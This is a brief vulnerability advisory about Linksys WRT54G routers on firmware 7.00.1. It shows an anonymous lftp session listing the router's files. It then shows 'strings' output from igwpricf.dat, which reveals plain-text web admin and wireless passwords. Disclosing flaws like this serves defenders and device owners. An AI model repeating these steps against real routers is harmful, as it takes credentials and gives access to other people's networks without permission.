Linksys WRT54G with firmware version 7.00.1 suffers from an administrative password disclosure vulnerability via ftpd.
29ac89d17267faf8260fc55d0bf0cea35b3acec9de7d42041acbc8aaabc40393
Environment: Linksys WRT54G - Firmware Version: v7.00.1
Default settings of Linksys WRT54G allows to get FTP without password:
rafal@localhost ~ $ lftp 192.168.1.1
lftp 192.168.1.1:~> dir
size date time name
-------- ------ ------ --------
956756 Jan-01-2003 02:13:12 ap61.sys
224664 Jan-01-2003 02:13:24 igwhtm.dat
28528 Jan-01-2003 02:13:26 langpak_en
28482 Apr-08-2011 15:36:44 igwpricf.dat
2520 Apr-08-2011 15:11:02 nvram.cfg
2046 Dec-24-2001 00:02:42 calibra.dat
lftp 192.168.1.1:~>
It is possible to download igwpricf.dat file (and another) where plain-text password to web access and wireless network are keeping.
rafal@localhost ~ $ strings igwpricf.dat
Linksys
IntotoSoft
192.168.50.3
...
Aadmin
PASSWORD
test
best
...
WIRELESS_PASSWORD
...
default
langpak_en
TELNET
HTTP
SMTP
POP3
-----------------
RaFD